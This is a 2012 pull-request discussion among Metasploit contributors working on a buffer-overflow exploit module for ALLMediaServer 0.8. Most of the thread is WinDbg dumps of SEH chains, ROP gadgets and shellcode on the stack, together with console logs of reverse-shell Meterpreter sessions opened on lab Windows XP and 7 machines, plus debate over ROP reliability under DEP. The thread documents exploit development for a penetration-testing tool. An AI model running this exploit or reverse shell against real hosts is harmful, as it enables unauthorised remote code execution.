Review of pull request #606 #607

Merged
merged 1 commit into from Jul 14, 2012

Conversation

jvazquez-r7
Contributor

Changes:

  • Make it msftidy compliant
  • Make it compatible with Windows 7 SP1

@wchen-r7 wchen-r7 merged commit bdf009d into rapid7:master Jul 14, 2012
@modpr0be
Contributor

Tested, and worked. Sorry, I must have slept away. Thanks anyway.
Obviously I will learn from the modified version.

@modpr0be
Contributor

Hi, I'm sorry for the late follow-up. This exploit works on my W7 SP1 on my VM, then I tested on another machine, and the exploit doesn't work. I tried mine also, and it works. The operating system is still the same, latest update from MS. Here is the dump of this exploit (#607):

0:007> bp 65ec74dc
0:007> t
eax=0200fd2c ebx=00000000 ecx=00000000 edx=0a3bde94 esi=0200fd2c edi=0200fd1c
eip=77106fe9 esp=0200f5cc ebp=0200fd40 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
ntdll!KiUserExceptionDispatcher+0x1:
77106fe9 8b4c2404        mov     ecx,dword ptr [esp+4] ss:0023:0200f5d0=f0f50002
0:007> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=65ec74dc edx=771071ad esi=00000000 edi=00000000
eip=65ec74dc esp=0200f4ec ebp=0200f50c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
avcodec_53!avpriv_aac_parse_header+0x104c:
65ec74dc 81c4cc060000    add     esp,6CCh
0:007> d esp+6cc
0200fbb8  86 9e 7c 9a a7 02 96 4d-da 88 eb 4c 51 05 3e 2e  ..|....M...LQ.>.
0200fbc8  02 fa b5 ae c3 6b dc 7a-3f f1 10 d5 7e 64 51 3e  .....k.z?...~dQ>
0200fbd8  c3 d7 25 f7 0c 9f ca 8e-b9 ca 95 62 35 09 0b 6c  ..%........b5..l
0200fbe8  c0 2e 92 1a 2d 05 31 5f-12 d5 ff 70 d5 40 85 b1  ....-.1_...p.@..
0200fbf8  e6 d4 43 fa 49 c9 d6 f3-63 c4 cf c6 c9 86 48 2e  ..C.I...c.....H.
0200fc08  ba 5e a1 c5 e6 e0 1b 8c-ea fc a9 28 68 1a 7b 08  .^.........(h.{.
0200fc18  de e8 11 ed 1c f4 25 b9-6d 07 ac f5 8b b2 3f 86  ......%.m.....?.
0200fc28  d9 2c e9 d8 c4 d3 e0 60-6d 58 ff 4b 3a 7c 71 20  .,.....`mX.K:|q 
0:007> d esp+6cc L100
0200fbb8  86 9e 7c 9a a7 02 96 4d-da 88 eb 4c 51 05 3e 2e  ..|....M...LQ.>.
0200fbc8  02 fa b5 ae c3 6b dc 7a-3f f1 10 d5 7e 64 51 3e  .....k.z?...~dQ>
0200fbd8  c3 d7 25 f7 0c 9f ca 8e-b9 ca 95 62 35 09 0b 6c  ..%........b5..l
0200fbe8  c0 2e 92 1a 2d 05 31 5f-12 d5 ff 70 d5 40 85 b1  ....-.1_...p.@..
0200fbf8  e6 d4 43 fa 49 c9 d6 f3-63 c4 cf c6 c9 86 48 2e  ..C.I...c.....H.
0200fc08  ba 5e a1 c5 e6 e0 1b 8c-ea fc a9 28 68 1a 7b 08  .^.........(h.{.
0200fc18  de e8 11 ed 1c f4 25 b9-6d 07 ac f5 8b b2 3f 86  ......%.m.....?.
0200fc28  d9 2c e9 d8 c4 d3 e0 60-6d 58 ff 4b 3a 7c 71 20  .,.....`mX.K:|q 
0200fc38  68 46 63 e0 ab b5 a6 44-2f e8 80 f2 e6 92 8d 4e  hFc....D/......N
0200fc48  05 b1 30 87 31 94 de 1d-ac 8b 05 13 b0 dc 4f 00  ..0.1.........O.
0200fc58  e7 70 4c 47 b9 46 97 4f-1b 7f c9 cb a3 d9 fc 13  .pLG.F.O........
0200fc68  d8 40 f9 e2 1a 1b 76 e2-03 ab 69 3a 5d e4 17 8c  .@....v...i:]...
0200fc78  e9 9a 9e b3 92 bd 72 82-43 87 18 f9 3b 9a 19 9f  ......r.C...;...
0200fc88  a7 dc e8 a4 bb dc b4 b7-97 60 d4 23 ac 00 65 10  .........`.#..e.
0200fc98  25 2d c1 a5 8f e3 b7 7e-a5 b5 0c 53 a4 d1 40 70  %-.....~...S..@p
0200fca8  5f d0 bf ba 52 3e 40 6c-df 96 36 f8 c9 82 bc d9  _...R>@l..6.....

And here is mine (#606):

0:009> !exchain
02b6f8e8: MediaServer+13444a (0053444a)
02b6fd48: avformat_53!avpriv_dv_produce_packet+119ad (6ab3535d)
Invalid exception stack at f41406eb
0:009> bp 6ab3535d
0:009> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6ab3535d edx=771071ad esi=00000000 edi=00000000
eip=6ab3535d esp=02b6f4ec ebp=02b6f50c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
avformat_53!avpriv_dv_produce_packet+0x119ad:
6ab3535d 81c44c040000    add     esp,44Ch
0:009> d esp+44c L100
02b6f938  a1 0a 5a 66 a1 0a 5a 66-a1 0a 5a 66 a1 0a 5a 66  ..Zf..Zf..Zf..Zf
02b6f948  a1 0a 5a 66 a1 0a 5a 66-a1 0a 5a 66 a1 0a 5a 66  ..Zf..Zf..Zf..Zf
02b6f958  a1 0a 5a 66 a1 0a 5a 66-a1 0a 5a 66 a7 fa f6 65  ..Zf..Zf..Zf...e
02b6f968  e0 e4 1e 67 b4 cc c1 6a-df ee 7c 66 6d 75 75 65  ...g...j..|fmuue
02b6f978  9d f0 f5 65 0d 83 f9 65-d5 c1 c1 6a 01 02 00 00  ...e...e...j....
02b6f988  e2 a1 72 66 40 00 00 00-df 09 5a 66 3d 8a d5 6a  ..rf@.....Zf=..j
02b6f998  71 a7 c7 6a a1 0a 5a 66-f4 f9 82 66 90 90 90 90  q..j..Zf...f....
02b6f9a8  d2 cb 3d 66 81 c4 54 f2-ff ff b8 10 da 50 09 db  ..=f..T......P..
02b6f9b8  d6 d9 74 24 f4 5e 29 c9-b1 4f 31 46 14 83 c6 04  ..t$.^)..O1F....
02b6f9c8  03 46 10 f2 2f ac e1 7b-cf 4d f2 1b 59 a8 c3 09  .F../..{.M..Y...
02b6f9d8  3d b8 76 9d 35 ec 7a 56-1b 05 08 1a b4 2a b9 90  =.v.5.zV.....*..
02b6f9e8  e2 05 3a 15 2b c9 f8 34-d7 10 2d 96 e6 da 20 d7  ..:.+..4..-... .
02b6f9f8  2f 06 ca 85 f8 4c 79 39-8c 11 42 38 42 1e fa 42  /....Ly9..B8B..B
02b6fa08  e7 e1 8f f8 e6 31 3f 77-a0 a9 4b df 11 cb 98 3c  .....1?w..K....<
02b6fa18  6d 82 95 f6 05 15 7c c7-e6 27 40 8b d8 87 4d d2  m.....|..'@...M.
02b6fa28  1d 2f ae a1 55 53 53 b1-ad 29 8f 34 30 89 44 ee  ./..USS..).40.D.

msf exploit(allmediaserver_bof) > exploit

[*] Started reverse handler on 10.10.10.2:4444
[*] Sending payload to ALLMediaServer on Windows 7 SP1 - English...
[*] Sending stage (752128 bytes) to 10.10.10.7
[*] Meterpreter session 1 opened (10.10.10.2:4444 -> 10.10.10.7:2630) at 2012-07-15 12:51:24 +0700

meterpreter > sysinfo
Computer : LAB1
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter >

OS Version:
C:\Users\lab>systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
OS Name: Microsoft Windows 7 Ultimate
OS Version: 6.1.7601 Service Pack 1 Build 7601

C:\Users\lab>

@jvazquez-r7
Contributor Author

Hi modpr0be,

Today I'll do new tests on W7 SP1 over fresh VirtualBox and VMware virtual machines. If we cannot confirm exploit reliability on W7 SP1 with ROP between virtual/physical machines, maybe we'll need to avoid ROP on W7. Since W7 is OptIn by default, it could be acceptable :)

I'll update with results along the day.

@modpr0be
Contributor

Hi jvazquez,

OK. Thanks for this. Will do the same test on a fresh VMware install.

cheers.

@jvazquez-r7
Contributor Author

Hi modpr0be,

Working on a VMware virtual machine:

msf  exploit(allmediaserver_bof) > set target 1
target => 1
msf  exploit(allmediaserver_bof) > set RHOST 192.168.1.137
RHOST => 192.168.1.137
msf  exploit(allmediaserver_bof) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.157:4444 
[*] Sending payload to ALLMediaServer on ALLMediaServer 0.8 / Windows 7 SP1 - English...
[*] Sending stage (752128 bytes) to 192.168.1.137
[*] Meterpreter session 3 opened (192.168.1.157:4444 -> 192.168.1.137:49161) at 2012-07-15 15:50:19 +0200

meterpreter > run checkvm
[*] Checking if target is a Virtual Machine .....
[*] This is a VMware Virtual Machine
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 

But failing on VirtualBox:

msf  exploit(allmediaserver_bof) > set target 1
target => 1
msf  exploit(allmediaserver_bof) > set RHOST 192.168.1.132
RHOST => 192.168.1.132
msf  exploit(allmediaserver_bof) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.157:4444 
[*] Sending payload to ALLMediaServer on ALLMediaServer 0.8 / Windows 7 SP1 - English...
msf  exploit(allmediaserver_bof) > 

The crash on the VirtualBox virtual machine:

(ee8.e5c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=019bfd2c ebx=00000000 ecx=00000000 edx=6f62b418 esi=019bfd2c edi=019bfd1c
eip=00407cc0 esp=019bf8d4 ebp=019bfd40 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
MediaServer+0x7cc0:
00407cc0 8b4af8          mov     ecx,dword ptr [edx-8] ds:0023:6f62b410=????????
0:006> !exchain
019bf8e8: MediaServer+13444a (0053444a)
019bfd48: *** ERROR: Symbol file could not be found.  Defaulted to
export symbols for C:\Program Files\ALLMediaServer\avcodec-53.dll -
avcodec_53!avpriv_aac_parse_header+104c (65ec74dc)
Invalid exception stack at 539706eb
0:006> bp 65ec74dc
0:006> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=65ec74dc edx=778071cd esi=00000000 edi=00000000
eip=65ec74dc esp=019bf4ec ebp=019bf50c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
avcodec_53!avpriv_aac_parse_header+0x104c:
65ec74dc 81c4cc060000    add     esp,6CCh
0:006> dd esp + 6cc
019bfbb8  685e8d55 68493408 8031b335 ca8f7708
019bfbc8  0c14b8b8 f37724b7 40434832 4b8492c6
019bfbd8  033d6df7 31974de7 adab911c 9a071121
019bfbe8  09ee7219 654cd442 e7a89d96 50921f67
019bfbf8  e3acef0d 8215297c 02b3a9ca 3a4fdf3b
019bfc08  2acfa068 7aef339a 7923567b 438d7853
019bfc18  ba89a0cf 05fd5780 d2aed9e9 b49a9229
019bfc28  0f14e825 0e6522a3 3dc44977 6df0dd54
0:006> dd esp + 6cc - 150
019bfa68  665a0aa1 665a0aa1 665a0aa1 665a0aa1
019bfa78  665a0aa1 665a0aa1 665a0aa1 665a0aa1
019bfa88  665a0aa1 665a0aa1 665a0aa1 65f6faa7
019bfa98  671ee4e0 6ac1ccb4 667ceedf 70476972
019bfaa8  65f5f09d 65f9830d 6ac1c1d5 00000600
019bfab8  6672a1e2 00000040 665a09df 6ad58a3d
019bfac8  6ac7a771 665a0aa1 6682f9f4 90909090
019bfad8  663dcbd2 00026fe9 53b8ca00 70102cef

Ugly :\ Performing more testing....

@jvazquez-r7
Contributor Author

Avoiding the ROP exploit makes it work on W7 even on VirtualBox:

msf  exploit(allmediaserver_bof_no_rop) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.157:4444 
[*] Sending payload to ALLMediaServer on ALLMediaServer 0.8 / Windows 7 SP1 - English...
[*] Sending stage (752128 bytes) to 192.168.1.132
[*] Meterpreter session 4 opened (192.168.1.157:4444 -> 192.168.1.132:49221) at 2012-07-15 16:28:40 +0200

meterpreter > sysinfo
Computer        : JUAN-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > run checkvm
[*] Checking if target is a Virtual Machine .....
[*] This is a Sun VirtualBox Virtual Machine
meterpreter > 

Now checking if the exploit with ROP is reliable across different virtual machines with Windows XP SP3. I'm thinking of avoiding the ROP exploit in the case of W7... anyway it's OptOut and ALLMediaServer runs without DEP by default.
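The comments above turn on whether the host's DEP policy (OptIn/OptOut) actually applies to this 32-bit server. The following PowerShell check is an added example, not code from the pull request or from Metasploit: it reports the system-wide DEP policy from WMI and asks kernel32!GetProcessDEPPolicy whether a named 32-bit process runs with DEP enabled. The process name "MediaServer" is assumed from the debugger output in the thread.

```powershell
# Added example, not part of the pull request or of Metasploit.
# Reports the boot-time DEP policy and the per-process DEP state that decide
# whether a ROP chain is even needed against a 32-bit service.
param([string]$ProcessName = "MediaServer")   # name assumed from the thread's debugger output

# Win32_OperatingSystem.DataExecutionPrevention_SupportPolicy values:
#   0 = AlwaysOff, 1 = AlwaysOn, 2 = OptIn (client default), 3 = OptOut
$policyNames = @{ 0 = "AlwaysOff"; 1 = "AlwaysOn"; 2 = "OptIn"; 3 = "OptOut" }
$os = Get-WmiObject -Class Win32_OperatingSystem
$policy = [int]$os.DataExecutionPrevention_SupportPolicy
"System DEP policy   : {0} ({1})" -f $policyNames[$policy], $policy
"DEP for 32-bit apps : {0}" -f $os.DataExecutionPrevention_32BitApplications

# Per-process state comes from kernel32!GetProcessDEPPolicy; it only answers
# for 32-bit processes, which is the case for this server.
Add-Type -Namespace Win32 -Name Dep -MemberDefinition @'
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool GetProcessDEPPolicy(IntPtr hProcess, out uint lpFlags, out bool lpPermanent);
'@
$PROCESS_DEP_ENABLE = 1

foreach ($p in Get-Process -Name $ProcessName -ErrorAction SilentlyContinue) {
    $flags = [uint32]0
    $permanent = $false
    if ([Win32.Dep]::GetProcessDEPPolicy($p.Handle, [ref]$flags, [ref]$permanent)) {
        $state = "DISABLED"
        if ($flags -band $PROCESS_DEP_ENABLE) { $state = "enabled" }
        if ($permanent) { $state += " (permanent)" }
        "{0} (PID {1}): DEP {2}" -f $p.ProcessName, $p.Id, $state
    } else {
        "{0} (PID {1}): GetProcessDEPPolicy failed (64-bit process or access denied)" -f $p.ProcessName, $p.Id
    }
}
```

A process reported as "DEP DISABLED" under an OptIn policy is the situation the thread describes: the mitigation exists on the host but does not cover the service.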

@jvazquez-r7
Contributor Author

Tested successfully with ROP on VirtualBox:

msf  exploit(allmediaserver_bof) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.157:4444 
[*] Sending payload to ALLMediaServer on ALLMediaServer 0.8 / Windows XP SP3 - English...
[*] Sending stage (752128 bytes) to 192.168.1.133
[*] Meterpreter session 5 opened (192.168.1.157:4444 -> 192.168.1.133:1097) at 2012-07-15 16:35:53 +0200

meterpreter > sysinfo
Computer        : HOME-DF26FC7444
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > run checkvm
[*] Checking if target is a Virtual Machine .....
[*] This is a Sun VirtualBox Virtual Machine
meterpreter > 

I'm going to send a new pull request, avoiding ROP in the case of W7, and ask a more experienced developer to agree with the decision :)

@modpr0be
Contributor

Well, avoiding ROP should be OK then. I have time now, just finished work; I'll try the test again.

@jvazquez-r7
Contributor Author

Hi modpr0be,

Feel free to test pull request #608 as a patch for the W7 situation until a reliable ROP version is built! I'm going to ask a more experienced developer to check. In the meanwhile, trying to build a ROP chain that is reliable between environments could be nice, maybe prepending a lot of ROP NOPs before the ROP chain.